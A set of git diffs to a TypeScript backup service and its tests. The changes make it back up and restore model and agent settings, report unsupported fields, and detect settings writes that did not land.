+    expect(JSON.stringify(published)).not.toContain("apiServerPort");
+
+    config.state = {
+      projects: new Map(),
+      agentAiDefaults: { exec: { modelString: "openai:gpt-local" } },
+      defaultModel: "openai:gpt-local",
+      hiddenModels: ["openai:gpt-old"],
+      advisorMaxUsesPerTurn: 2,
+      apiServerPort: 9999,
+      terminalDefaultShell: "/bin/fish",
+    };
+    const preview = await payload.previewRestore({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: false,
+    });
+    expect(preview.changes).toEqual([{ status: "M", path: "preferences.json" }]);
+
+    await payload.restore({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: false,
+      snapshotPath: path.join(tempDir, "restore-snapshot"),
+      matchedProjects: [],
+    });
+    expect(config.state.agentAiDefaults).toEqual(backedUp.agentAiDefaults);
+    expect(config.state.defaultModel).toBe("anthropic:claude-exec");
+    expect(config.state.apiServerPort).toBe(9999);
+    expect(config.state.terminalDefaultShell).toBe("/bin/fish");
+
+    // Restoring again changes nothing once the settings already match.
+    const afterRestore = await payload.previewRestore({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: false,
+    });
+    expect(afterRestore.changes).toEqual([]);
+  });
+
+  it("reports a lost settings write instead of restoring silently", async () => {
+    config.state = { projects: new Map(), defaultModel: "anthropic:claude-exec" };
+    const gitRepo = createBackupGitRepo({ cacheRoot });
+    const payload = createBackupPayloadStore({ config });
+    const repository = await gitRepo.prepare(settings);
+    await payload.exportTo({
+      repositoryRoot: repository.rootDir,
+      managedPath: settings.path,
+      includeProjects: false,
+    });
+
+    config.state = { projects: new Map(), defaultModel: "openai:gpt-local" };
+    spyOn(config, "editConfig").mockImplementation((edit) => {
+      edit(config.state);
+      return Promise.resolve();
+    });
+
+    const error = await captureRejection(
+      payload.restore({
+        repositoryRoot: repository.rootDir,
+        managedPath: settings.path,
+        includeProjects: false,
+        snapshotPath: path.join(tempDir, "restore-snapshot"),
+        matchedProjects: [],
+      })
+    );
+    expect((error as Error).message).toContain("could not be written");
+  });
+
   it("keeps preferences another window saved while the restore ran", async () => {
     config.state = { projects: new Map(), userPreferences: { appearance: { theme: "dark" } } };
     await writeFixtureFile(muxRoot, "AGENTS.md", "backed up\n");

--- a/src/node/services/backup/adapters.ts
+++ b/src/node/services/backup/adapters.ts
@@ -13,7 +13,7 @@ import {
 import { log } from "@/node/services/log";
 import { AsyncSemaphore } from "@/node/utils/concurrency/asyncSemaphore";
 import { isSystemProjectEntry } from "@/common/utils/systemProjects";
-import type { ProjectConfig } from "@/common/types/project";
+import type { ProjectConfig, ProjectsConfig } from "@/common/types/project";
 import { getProjectDisplayName } from "@/common/utils/subProjects";
 import { projectMemoryDirName } from "@/node/services/memoryService";
 import {
@@ -76,6 +76,11 @@ import {
   type MatchedProjectEntry,
   type ProjectBundleRestorePlan,
 } from "./payload";
+import {
+  mergeBackupSettings,
+  projectBackupSettings,
+  readBackupSettings,
+} from "./settingsProjection";
 
 /**
  * Parses `git status --porcelain=v1 -z`, whose records are NUL-terminated with verbatim
@@ -241,13 +246,8 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
     return await resolveContainedPath(repositoryRoot, segments.join("/"));
   }
 
-  function localPreferences() {
-    return options.config.loadConfigOrDefault().userPreferences;
-  }
-
-  /** The portable subset an export writes. Machine-local keys are excluded by design. */
-  function exportablePreferences() {
-    return projectBackupPreferences(localPreferences() ?? {});
+  function backupSettingsDiffer(a: ProjectsConfig, b: ProjectsConfig): boolean {
+    return JSON.stringify(projectBackupSettings(a)) !== JSON.stringify(projectBackupSettings(b));
   }
 
   async function localFilesByPath(): Promise<Map<string, BackupFile>> {
@@ -255,9 +255,13 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
   }
 
   async function buildPayload(overrides?: { keepLocalSecrets: true }) {
+    // Both projections are the portable subsets an export writes; machine-local keys are
+    // excluded by design.
+    const config = options.config.loadConfigOrDefault();
     return await createBackupPayload({
       muxRoot,
-      preferences: exportablePreferences(),
+      preferences: projectBackupPreferences(config.userPreferences ?? {}),
+      settings: projectBackupSettings(config),
       muxVersion: resolveMuxVersion(),
       sourceLabel: path.basename(muxRoot),
       // The service owns the user-facing override, so report rather than throw.
@@ -562,9 +566,16 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
         // file, so compare the merge result. A backup that only repeats values the local
         // config already holds changes nothing.
         if (file.path === "preferences.json") {
-          const local = localPreferences();
-          const merged = mergeBackupPreferences(local, JSON.parse(file.content.toString("utf-8")));
-          if (!serializeBackupPreferences(local).equals(serializeBackupPreferences(merged))) {
+          const document: unknown = JSON.parse(file.content.toString("utf-8"));
+          const localConfig = options.config.loadConfigOrDefault();
+          const local = localConfig.userPreferences;
+          const merged = mergeBackupPreferences(local, document);
+          const backupSettings = readBackupSettings(document);
+          if (
+            !serializeBackupPreferences(local).equals(serializeBackupPreferences(merged)) ||
+            (backupSettings !== undefined &&
+              backupSettingsDiffer(localConfig, mergeBackupSettings(localConfig, backupSettings)))
+          ) {
             changes.push({ status: "M", path: file.path });
           }
           continue;
@@ -699,16 +710,22 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
           approvedCommandTokens: restoreOptions.approvedCommandTokens,
         });
         if (result.backupPreferences !== undefined) {
-          let merged: ReturnType<typeof normalizeUserPreferences> | undefined;
+          const backupSettings = readBackupSettings(result.backupPreferences);
+          let merged: ProjectsConfig | undefined;
           await options.config.editConfig(
             (current) => {
               // Merged against the config this edit reads, not a snapshot taken before the
               // restore: a whole-object write would otherwise discard preferences another
               // window saved meanwhile, including the machine-local keys no backup carries.
-              merged = normalizeUserPreferences(
-                mergeBackupPreferences(current.userPreferences, result.backupPreferences)
-              );
-              return { ...current, userPreferences: merged };
+              const next: ProjectsConfig = {
+                ...current,
+                userPreferences: normalizeUserPreferences(
+                  mergeBackupPreferences(current.userPreferences, result.backupPreferences)
+                ),
+              };
+              merged =
+                backupSettings === undefined ? next : mergeBackupSettings(next, backupSettings);
+              return merged;
             },
             // Inside the project restore's registration window the edit must ride that
             // window's hold: taking its own would wait on itself.
@@ -718,10 +735,13 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
           // the preferences landed. Compared through the backup projection because every
           // key a restore can change is portable, so a lost write is visible there, while
           // machine-local keys the load path normalizes differently stay out of the check.
-          const stored = options.config.loadConfigOrDefault().userPreferences;
+          const stored = options.config.loadConfigOrDefault();
           if (
             merged !== undefined &&
-            !serializeBackupPreferences(stored ?? {}).equals(serializeBackupPreferences(merged))
+            (!serializeBackupPreferences(stored.userPreferences ?? {}).equals(
+              serializeBackupPreferences(merged.userPreferences)
+            ) ||
+              backupSettingsDiffer(stored, merged))
           ) {
             throw new BackupServiceError(
               "IO_ERROR",

--- a/src/node/services/backup/adapters.ts
+++ b/src/node/services/backup/adapters.ts
@@ -544,6 +544,7 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
           commandApprovals: [],
           projectImports: [],
           projectBundleSkipped: false,
+          unsupportedSettings: [],
         };
       }
 
@@ -561,6 +562,7 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
         restoredPaths
       );
       const changes: BackupFileChange[] = [];
+      let unsupportedSettings: string[] = [];
       for (const file of payload.files) {
         // Preferences live in config, and restore merges them rather than replacing the
         // file, so compare the merge result. A backup that only repeats values the local
@@ -571,10 +573,14 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
           const local = localConfig.userPreferences;
           const merged = mergeBackupPreferences(local, document);
           const backupSettings = readBackupSettings(document);
+          unsupportedSettings = backupSettings.unsupported;
           if (
             !serializeBackupPreferences(local).equals(serializeBackupPreferences(merged)) ||
-            (backupSettings !== undefined &&
-              backupSettingsDiffer(localConfig, mergeBackupSettings(localConfig, backupSettings)))
+            (backupSettings.settings !== undefined &&
+              backupSettingsDiffer(
+                localConfig,
+                mergeBackupSettings(localConfig, backupSettings.settings)
+              ))
           ) {
             changes.push({ status: "M", path: file.path });
           }
@@ -623,6 +629,7 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
         ),
         projectImports,
         projectBundleSkipped,
+        unsupportedSettings,
       };
     },
 
@@ -703,14 +710,16 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
 
       const restoreCore = async (
         registration: ProjectRegistrationLockHandle | null
-      ): Promise<{ localOnlyFiles: string[] }> => {
+      ): Promise<{ localOnlyFiles: string[]; unsupportedSettings: string[] }> => {
         const result = await restoreBackupPayload({
           muxRoot,
           payload,
           approvedCommandTokens: restoreOptions.approvedCommandTokens,
         });
+        let unsupportedSettings: string[] = [];
         if (result.backupPreferences !== undefined) {
           const backupSettings = readBackupSettings(result.backupPreferences);
+          unsupportedSettings = backupSettings.unsupported;
           let merged: ProjectsConfig | undefined;
           await options.config.editConfig(
             (current) => {
@@ -724,7 +733,9 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
                 ),
               };
               merged =
-                backupSettings === undefined ? next : mergeBackupSettings(next, backupSettings);
+                backupSettings.settings === undefined
+                  ? next
+                  : mergeBackupSettings(next, backupSettings.settings);
               return merged;
             },
             // Inside the project restore's registration window the edit must ride that
@@ -749,13 +760,13 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
             );
           }
         }
-        return { localOnlyFiles: result.localOnlyFiles };
+        return { localOnlyFiles: result.localOnlyFiles, unsupportedSettings };
       };
 
       let projectBundleSkipped = false;
       const restoredProjectMemory: Array<{ projectPath: string; files: string[] }> = [];
       const memoryChanges: string[] = [];
-      let core: { localOnlyFiles: string[] };
+      let core: { localOnlyFiles: string[]; unsupportedSettings: string[] };
       // The bundle itself is read here — the repo lock holds the checkout stable — but its
       // plan is computed inside the memory lock below, where the inputs it depends on are.
       const bundle = restoreOptions.includeProjects ? await readProjectBundle(sourceDir) : null;
@@ -885,6 +896,7 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
         changedFiles: [...changedFiles, ...memoryChanges].sort(),
         localOnlyFiles: core.localOnlyFiles,
         projectBundleSkipped,
+        unsupportedSettings: core.unsupportedSettings,
         restoredProjectMemory,
       };
     },

--- a/src/node/services/backup/backupService.integration.test.ts
+++ b/src/node/services/backup/backupService.integration.test.ts
@@ -387,6 +387,42 @@ describe("BackupService against a real repository", () => {
     expect(preview.data.restoreChanges).toEqual([]);
   });
 
+  it("restores a source that reset its settings by clearing the target's overrides", async () => {
+    // The source machine never set (or cleared) these; the backup must still bring the target
+    // back to the defaults rather than leaving the target's own values in place.
+    await pushOrThrow();
+
+    await config.editConfig((current) => ({
+      ...current,
+      agentAiDefaults: { exec: { modelString: "openai:gpt-local", thinkingLevel: "high" } },
+      modelFallbacks: { "openai:gpt-local": { models: ["anthropic:claude-exec"] } },
+      advisorModelString: "openai:gpt-advisor",
+      heartbeatDefaultPrompt: "Local prompt",
+      chatTranscriptFullWidth: true,
+      defaultRuntime: "docker",
+      apiServerPort: 9999,
+    }));
+    const changed = await service.preview(settings);
+    if (!changed.success) throw new Error(changed.error.message);
+    expect(changed.data.restoreChanges).toContainEqual({ status: "M", path: "preferences.json" });
+
+    const restored = await service.restore(settings);
+    if (!restored.success) throw new Error(restored.error.message);
+
+    const loaded = config.loadConfigOrDefault();
+    expect(loaded.agentAiDefaults).toEqual({});
+    expect(loaded.modelFallbacks?.["openai:gpt-local"]).toBeUndefined();
+    expect(loaded.advisorModelString).toBeUndefined();
+    expect(loaded.heartbeatDefaultPrompt).toBeUndefined();
+    expect(loaded.chatTranscriptFullWidth).toBeFalsy();
+    expect(loaded.defaultRuntime).toBeUndefined();
+    expect(loaded.apiServerPort).toBe(9999);
+
+    const preview = await service.preview(settings);
+    if (!preview.success) throw new Error(preview.error.message);
+    expect(preview.data.restoreChanges).toEqual([]);
+  });
+
   it("restores and re-pushes a pre-rename mux/ backup through xum/ settings", async () => {
     // The backup was pushed while the default managed path was still `mux/`.
     const pushed = await pushOrThrow();

--- a/src/node/services/backup/backupService.integration.test.ts
+++ b/src/node/services/backup/backupService.integration.test.ts
@@ -343,6 +343,50 @@ describe("BackupService against a real repository", () => {
     expect(service.getSettings()?.lastRestoredCommit).toBe(pushed.data.commit);
   });
 
+  it("round-trips model and agent settings through config.json", async () => {
+    // Through the real Config, so the restore's post-write check runs against what the
+    // save and load normalizers actually persist rather than an in-memory stand-in.
+    const backedUp = {
+      agentAiDefaults: {
+        exec: { modelString: "anthropic:claude-exec", thinkingLevel: "high" as const },
+        plan: { modelString: "openai:gpt-plan", advisorEnabled: true },
+      },
+      defaultModel: "anthropic:claude-exec",
+      hiddenModels: ["openai:gpt-old"],
+      advisorMaxUsesPerTurn: 2,
+      heartbeatDefaultPrompt: "Check in",
+      taskSettings: { maxParallelAgentTasks: 4, maxTaskNestingDepth: 2 },
+    };
+    await config.editConfig((current) => ({ ...current, ...backedUp, apiServerPort: 4321 }));
+    await pushOrThrow();
+
+    await config.editConfig((current) => ({
+      ...current,
+      agentAiDefaults: { exec: { modelString: "openai:gpt-local" } },
+      defaultModel: "openai:gpt-local",
+      hiddenModels: [],
+      advisorMaxUsesPerTurn: null,
+      heartbeatDefaultPrompt: "Local prompt",
+      taskSettings: { maxParallelAgentTasks: 1, maxTaskNestingDepth: 1 },
+      apiServerPort: 9999,
+    }));
+    const restored = await service.restore(settings);
+    if (!restored.success) throw new Error(restored.error.message);
+
+    const loaded = config.loadConfigOrDefault();
+    expect(loaded.agentAiDefaults).toMatchObject(backedUp.agentAiDefaults);
+    expect(loaded.defaultModel).toBe(backedUp.defaultModel);
+    expect(loaded.hiddenModels).toEqual(backedUp.hiddenModels);
+    expect(loaded.advisorMaxUsesPerTurn).toBe(backedUp.advisorMaxUsesPerTurn);
+    expect(loaded.heartbeatDefaultPrompt).toBe(backedUp.heartbeatDefaultPrompt);
+    expect(loaded.taskSettings).toMatchObject(backedUp.taskSettings);
+    expect(loaded.apiServerPort).toBe(9999);
+
+    const preview = await service.preview(settings);
+    if (!preview.success) throw new Error(preview.error.message);
+    expect(preview.data.restoreChanges).toEqual([]);
+  });
+
   it("restores and re-pushes a pre-rename mux/ backup through xum/ settings", async () => {
     // The backup was pushed while the default managed path was still `mux/`.
     const pushed = await pushOrThrow();

--- a/src/node/services/backup/backupService.test.ts
+++ b/src/node/services/backup/backupService.test.ts
@@ -93,6 +93,7 @@ function createPayload(overrides: Partial<BackupPayloadStore> = {}): BackupPaylo
         commandApprovals: [],
         projectImports: [],
         projectBundleSkipped: false,
+        unsupportedSettings: [],
       }),
     validateRestore: () =>
       Promise.resolve({ hasProjectBundle: false, projectImports: [], matchedProjects: [] }),
@@ -102,6 +103,7 @@ function createPayload(overrides: Partial<BackupPayloadStore> = {}): BackupPaylo
         changedFiles: [],
         localOnlyFiles: [],
         projectBundleSkipped: false,
+        unsupportedSettings: [],
         restoredProjectMemory: [],
       }),
     prepareProjectImports: () =>
@@ -185,6 +187,7 @@ describe("BackupService", () => {
             changedFiles: ["AGENTS.md"],
             localOnlyFiles: ["skills/local/SKILL.md"],
             projectBundleSkipped: false,
+            unsupportedSettings: [],
             restoredProjectMemory: [],
           });
         },
@@ -380,6 +383,7 @@ describe("BackupService", () => {
             commandApprovals: [],
             projectImports: [],
             projectBundleSkipped: false,
+            unsupportedSettings: [],
           };
         },
       }),
@@ -425,6 +429,7 @@ describe("BackupService", () => {
             changedFiles: ["AGENTS.md"],
             localOnlyFiles: [],
             projectBundleSkipped: false,
+            unsupportedSettings: [],
             restoredProjectMemory: [],
           };
         },
@@ -539,6 +544,7 @@ describe("BackupService", () => {
             commandApprovals: [],
             projectImports: [],
             projectBundleSkipped: false,
+            unsupportedSettings: [],
           });
         },
         exportTo: () => {
@@ -575,6 +581,7 @@ describe("BackupService", () => {
             commandApprovals: [],
             projectImports: [],
             projectBundleSkipped: false,
+            unsupportedSettings: [],
           });
         },
         exportTo: (options) => {
@@ -595,6 +602,7 @@ describe("BackupService", () => {
             changedFiles: [],
             localOnlyFiles: [],
             projectBundleSkipped: false,
+            unsupportedSettings: [],
             restoredProjectMemory: [],
           });
         },
@@ -2617,6 +2625,7 @@ describe("BackupService project imports", () => {
             changedFiles: [],
             localOnlyFiles: [],
             projectBundleSkipped: false,
+            unsupportedSettings: [],
             restoredProjectMemory: [],
           });
         },
@@ -2650,6 +2659,7 @@ describe("BackupService project imports", () => {
             changedFiles: ["memory/project/matched-abc/deep/notes.md"],
             localOnlyFiles: [],
             projectBundleSkipped: false,
+            unsupportedSettings: [],
             restoredProjectMemory: [
               {
                 projectPath: "/home/dev/src/matched",
@@ -2749,6 +2759,7 @@ describe("BackupService project imports", () => {
             changedFiles: ["memory/project/alpha-abc/notes.md"],
             localOnlyFiles: [],
             projectBundleSkipped: false,
+            unsupportedSettings: [],
             restoredProjectMemory: [
               { projectPath: "/home/dev/src/alpha", files: ["memory/project/alpha-abc/notes.md"] },
             ],
@@ -2833,6 +2844,7 @@ describe("BackupService project imports", () => {
             commandApprovals: [],
             projectImports: [fresh],
             projectBundleSkipped: false,
+            unsupportedSettings: [],
           }),
         exportTo: () => Promise.reject(new Error("Backup has more than 256 projects")),
       }),

--- a/src/node/services/backup/backupService.ts
+++ b/src/node/services/backup/backupService.ts
@@ -84,6 +84,7 @@ export interface BackupPayloadStore {
     commandApprovals: BackupCommandApproval[];
     projectImports: BackupProjectImport[];
     projectBundleSkipped: boolean;
+    unsupportedSettings: string[];
   }>;
   validateRestore(options: {
     repositoryRoot: string;
@@ -113,6 +114,7 @@ export interface BackupPayloadStore {
     changedFiles: string[];
     localOnlyFiles: string[];
     projectBundleSkipped: boolean;
+    unsupportedSettings: string[];
     /** Matched memory actually written, per registered project, for change notification. */
     restoredProjectMemory: Array<{ projectPath: string; files: string[] }>;
   }>;
@@ -549,6 +551,7 @@ export class BackupService {
         commandApprovals: BackupCommandApproval[];
         projectImports: BackupProjectImport[];
         projectBundleSkipped: boolean;
+        unsupportedSettings: string[];
         pushError: string | null;
       },
       BackupOperationError
@@ -590,6 +593,7 @@ export class BackupService {
         commandApprovals: restorePreview.commandApprovals,
         projectImports: restorePreview.projectImports,
         projectBundleSkipped: restorePreview.projectBundleSkipped,
+        unsupportedSettings: restorePreview.unsupportedSettings,
         pushError: "pushError" in exported ? exported.pushError : null,
       });
     });
@@ -677,6 +681,7 @@ export class BackupService {
         localOnlyFiles: string[];
         projectImportResults: BackupProjectImportResult[];
         projectBundleSkipped: boolean;
+        unsupportedSettings: string[];
         /**
          * Candidates the restore did not import because no approval was given — a restore
          * run without a preview, or with candidates left unchecked. Reported so a
@@ -794,6 +799,7 @@ export class BackupService {
               localOnlyFiles: restored.localOnlyFiles,
               projectImportResults,
               projectBundleSkipped: restored.projectBundleSkipped,
+              unsupportedSettings: restored.unsupportedSettings,
               unapprovedProjectImports: [
                 ...unapprovedProjectImports,
                 ...validated.projectImports.filter((candidate) =>

--- a/src/node/services/backup/payload.test.ts
+++ b/src/node/services/backup/payload.test.ts
@@ -261,7 +261,7 @@ describe("backup payload", () => {
     );
   });
 
-  it("restores a settings block, accepts its absence, and rejects a malformed one before writing", async () => {
+  it("restores a settings block, accepts its absence, and skips values it does not understand", async () => {
     await writeFixtureFile(muxRoot, "AGENTS.md", "backed up\n");
     const settings = {
       defaultModel: "anthropic:claude-exec",
@@ -282,7 +282,7 @@ describe("backup payload", () => {
       muxRoot: restoreRoot,
       payload: await readBackupPayload(destination),
     });
-    expect(readBackupSettings(restored.backupPreferences)).toEqual(settings);
+    expect(readBackupSettings(restored.backupPreferences)).toEqual({ settings, unsupported: [] });
 
     // A backup written by a build that predates the block.
     await tamperPayloadFile(destination, "preferences.json", '{"appearance":{"theme":"dark"}}\n');
@@ -290,23 +290,30 @@ describe("backup payload", () => {
       muxRoot: restoreRoot,
       payload: await readBackupPayload(destination),
     });
-    expect(readBackupSettings(older.backupPreferences)).toBeUndefined();
+    expect(readBackupSettings(older.backupPreferences)).toEqual({
+      settings: undefined,
+      unsupported: [],
+    });
     expect(mergeBackupPreferences({}, older.backupPreferences)).toEqual({
       appearance: { theme: "dark" },
     });
 
-    const malformed = '{"settings":{"agentAiDefaults":{"exec":{"thinkingLevel":"bogus"}}}}\n';
-    await tamperPayloadFile(destination, "preferences.json", malformed);
-    await captureRejection(readBackupPayload(destination));
-    const untouched = path.join(tempDir, "untouched");
-    await fs.mkdir(untouched, { recursive: true });
-    await captureRejection(
-      restoreBackupPayload({
-        muxRoot: untouched,
-        payload: withPayloadFileText(payload, "preferences.json", malformed),
-      })
+    // A backup written by a newer build, with a value this build's schema does not know: the
+    // rest of the backup restores and the field is reported rather than failing the restore.
+    await tamperPayloadFile(
+      destination,
+      "preferences.json",
+      '{"settings":{"agentAiDefaults":{"exec":{"thinkingLevel":"bogus"}},"defaultModel":"anthropic:claude-plan"}}\n'
     );
-    expect(await fs.readdir(untouched)).toEqual([]);
+    const newer = await restoreBackupPayload({
+      muxRoot: restoreRoot,
+      payload: await readBackupPayload(destination),
+    });
+    expect(readBackupSettings(newer.backupPreferences)).toEqual({
+      settings: { defaultModel: "anthropic:claude-plan" },
+      unsupported: ["agentAiDefaults"],
+    });
+    expect(await fs.readFile(path.join(restoreRoot, "AGENTS.md"), "utf-8")).toBe("backed up\n");
   });
 
   it("keeps MCP commands and URLs while redacting literal header values", async () => {

--- a/src/node/services/backup/payload.test.ts
+++ b/src/node/services/backup/payload.test.ts
@@ -30,6 +30,7 @@ import {
   createBackupPayload,
   localOnlyPayloadFiles,
   mergeBackupPreferences,
+  projectBackupPreferences,
   matchedProjectWrites,
   planProjectBundleRestore,
   planRestoreWrites,
@@ -56,6 +57,7 @@ import {
   type BackupProjectBundleEntry,
 } from "@/common/config/schemas/settingsBackup";
 import { captureRejection, writeFixtureFile } from "./testHelpers";
+import { readBackupSettings } from "./settingsProjection";
 import { MEMORY_MAX_FILE_BYTES, MEMORY_MAX_FILES_PER_SCOPE } from "@/common/constants/memory";
 
 async function isExecutable(filePath: string): Promise<boolean> {
@@ -210,6 +212,10 @@ describe("backup payload", () => {
           defaultBaseByProject: { "/private/project": "main" },
         },
       },
+      settings: {
+        agentAiDefaults: { exec: { modelString: "anthropic:claude-exec", thinkingLevel: "high" } },
+        defaultModel: "anthropic:claude-exec",
+      },
     });
 
     expect(payload.files.map((file) => file.path)).toEqual([
@@ -234,7 +240,71 @@ describe("backup payload", () => {
         autoCompactionThresholdByModel: { "openai/gpt": 75 },
       },
       review: { includeUncommitted: true },
+      settings: {
+        agentAiDefaults: { exec: { modelString: "anthropic:claude-exec", thinkingLevel: "high" } },
+        defaultModel: "anthropic:claude-exec",
+      },
     });
+  });
+
+  it("keeps the settings block out of the preferences projection older builds rely on", () => {
+    // An older build parses the whole document as preferences; the block must be dropped by
+    // that parse rather than rejected, or newer backups would stop restoring there.
+    const settings = { defaultModel: "anthropic:claude-exec", heartbeatDefaultIntervalMs: 1 };
+    const document = { appearance: { theme: "dark" }, settings };
+    const { settings: _settings, ...withoutSettings } = document;
+    expect(projectBackupPreferences(document)).toEqual(projectBackupPreferences(withoutSettings));
+    expect(mergeBackupPreferences({ appearance: { theme: "light" } }, document)).toEqual(
+      mergeBackupPreferences({ appearance: { theme: "light" } }, withoutSettings)
+    );
+  });
+
+  it("restores a settings block, accepts its absence, and rejects a malformed one before writing", async () => {
+    await writeFixtureFile(muxRoot, "AGENTS.md", "backed up\n");
+    const settings = {
+      defaultModel: "anthropic:claude-exec",
+      agentAiDefaults: { exec: { thinkingLevel: "high" as const } },
+    };
+    const payload = await createBackupPayload({
+      muxRoot,
+      muxVersion: "1.2.3",
+      sourceLabel: "test-host",
+      settings,
+    });
+    const destination = path.join(tempDir, "with-settings");
+    await writeBackupPayload(destination, payload);
+    const restoreRoot = path.join(tempDir, "target");
+    await fs.mkdir(restoreRoot, { recursive: true });
+
+    const restored = await restoreBackupPayload({
+      muxRoot: restoreRoot,
+      payload: await readBackupPayload(destination),
+    });
+    expect(readBackupSettings(restored.backupPreferences)).toEqual(settings);
+
+    // A backup written by a build that predates the block.
+    await tamperPayloadFile(destination, "preferences.json", '{"appearance":{"theme":"dark"}}\n');
+    const older = await restoreBackupPayload({
+      muxRoot: restoreRoot,
+      payload: await readBackupPayload(destination),
+    });
+    expect(readBackupSettings(older.backupPreferences)).toBeUndefined();
+    expect(mergeBackupPreferences({}, older.backupPreferences)).toEqual({
+      appearance: { theme: "dark" },
+    });
+
+    const malformed = '{"settings":{"agentAiDefaults":{"exec":{"thinkingLevel":"bogus"}}}}\n';
+    await tamperPayloadFile(destination, "preferences.json", malformed);
+    await captureRejection(readBackupPayload(destination));
+    const untouched = path.join(tempDir, "untouched");
+    await fs.mkdir(untouched, { recursive: true });
+    await captureRejection(
+      restoreBackupPayload({
+        muxRoot: untouched,
+        payload: withPayloadFileText(payload, "preferences.json", malformed),
+      })
+    );
+    expect(await fs.readdir(untouched)).toEqual([]);
   });
 
   it("keeps MCP commands and URLs while redacting literal header values", async () => {

--- a/src/node/services/backup/payload.test.ts
+++ b/src/node/services/backup/payload.test.ts
@@ -250,12 +250,14 @@ describe("backup payload", () => {
   it("keeps the settings block out of the preferences projection older builds rely on", () => {
     // An older build parses the whole document as preferences; the block must be dropped by
     // that parse rather than rejected, or newer backups would stop restoring there.
-    const settings = { defaultModel: "anthropic:claude-exec", heartbeatDefaultIntervalMs: 1 };
-    const document = { appearance: { theme: "dark" }, settings };
-    const { settings: _settings, ...withoutSettings } = document;
-    expect(projectBackupPreferences(document)).toEqual(projectBackupPreferences(withoutSettings));
+    const preferences = { appearance: { theme: "dark" } };
+    const document = {
+      ...preferences,
+      settings: { defaultModel: "anthropic:claude-exec", heartbeatDefaultIntervalMs: 1 },
+    };
+    expect(projectBackupPreferences(document)).toEqual(projectBackupPreferences(preferences));
     expect(mergeBackupPreferences({ appearance: { theme: "light" } }, document)).toEqual(
-      mergeBackupPreferences({ appearance: { theme: "light" } }, withoutSettings)
+      mergeBackupPreferences({ appearance: { theme: "light" } }, preferences)
     );
   });
 

--- a/src/node/services/backup/payload.ts
+++ b/src/node/services/backup/payload.ts
@@ -23,6 +23,7 @@ import { MEMORY_MAX_FILE_BYTES, MEMORY_MAX_FILES_PER_SCOPE } from "@/common/cons
 import { isPlainObject } from "@/common/utils/isPlainObject";
 import { isErrnoWithCode } from "@/node/utils/fs";
 import type { BackupCommandApproval, BackupProjectImport } from "@/common/orpc/schemas/backup";
+import { readBackupSettings, type BackupSettings } from "./settingsProjection";
 
 export const BACKUP_SCHEMA_VERSION = 1;
 export const BACKUP_MANIFEST_FILE = "manifest.json";
@@ -124,6 +125,7 @@ export interface BackupPayload {
 export interface CreateBackupPayloadOptions {
   muxRoot: string;
   preferences?: UserPreferences;
+  settings?: BackupSettings;
   muxVersion: string;
   sourceLabel: string;
   exportedAt?: string;
@@ -857,11 +859,18 @@ function copyJson<T>(value: T): T {
   return JSON.parse(JSON.stringify(value)) as T;
 }
 
-export function serializeBackupPreferences(preferences: unknown): Buffer {
-  return Buffer.from(
-    `${JSON.stringify(projectBackupPreferences(preferences), null, 2)}\n`,
-    "utf-8"
-  );
+/**
+ * Top-level settings ride inside preferences.json rather than in a payload file of their own:
+ * an older build's manifest parser refuses unknown payload paths, while its non-strict
+ * UserPreferencesSchema strips the unknown `settings` key and restores what it understands.
+ */
+export function serializeBackupPreferences(
+  preferences: unknown,
+  settings?: BackupSettings
+): Buffer {
+  const document: Record<string, unknown> = { ...projectBackupPreferences(preferences) };
+  if (settings !== undefined && Object.keys(settings).length > 0) document.settings = settings;
+  return Buffer.from(`${JSON.stringify(document, null, 2)}\n`, "utf-8");
 }
 
 type Appearance = NonNullable<UserPreferences["appearance"]>;
@@ -1484,7 +1493,7 @@ export async function createBackupPayload(
   }
   files.push({
     path: "preferences.json",
-    content: serializeBackupPreferences(options.preferences),
+    content: serializeBackupPreferences(options.preferences, options.settings),
   });
   // Count and complexity only: this payload may be a local snapshot, whose names keep
   // current-filesystem forms that portable validation would refuse. Collection already
@@ -1832,7 +1841,9 @@ async function readBackupPayloadUnchecked(
   // writes anything. Otherwise a later parse failure leaves a half-restored install.
   const preferencesFile = files.find((file) => file.path === "preferences.json");
   if (preferencesFile) {
-    projectBackupPreferences(JSON.parse(preferencesFile.content.toString("utf-8")));
+    const parsed: unknown = JSON.parse(preferencesFile.content.toString("utf-8"));
+    projectBackupPreferences(parsed);
+    readBackupSettings(parsed);
   }
   const mcpFile = files.find((file) => file.path === "mcp.jsonc");
   const parsedMcp = mcpFile
@@ -2535,6 +2546,7 @@ export async function planRestoreWrites(
       // that edit runs rather than as it was before the restore.
       const parsed: unknown = JSON.parse(file.content.toString("utf-8"));
       projectBackupPreferences(parsed);
+      readBackupSettings(parsed);
       backupPreferences = parsed;
       continue;
     }

--- a/src/node/services/backup/payload.ts
+++ b/src/node/services/backup/payload.ts
@@ -23,7 +23,7 @@ import { MEMORY_MAX_FILE_BYTES, MEMORY_MAX_FILES_PER_SCOPE } from "@/common/cons
 import { isPlainObject } from "@/common/utils/isPlainObject";
 import { isErrnoWithCode } from "@/node/utils/fs";
 import type { BackupCommandApproval, BackupProjectImport } from "@/common/orpc/schemas/backup";
-import { readBackupSettings, type BackupSettings } from "./settingsProjection";
+import type { BackupSettings } from "./settingsProjection";
 
 export const BACKUP_SCHEMA_VERSION = 1;
 export const BACKUP_MANIFEST_FILE = "manifest.json";
@@ -1841,9 +1841,7 @@ async function readBackupPayloadUnchecked(
   // writes anything. Otherwise a later parse failure leaves a half-restored install.
   const preferencesFile = files.find((file) => file.path === "preferences.json");
   if (preferencesFile) {
-    const parsed: unknown = JSON.parse(preferencesFile.content.toString("utf-8"));
-    projectBackupPreferences(parsed);
-    readBackupSettings(parsed);
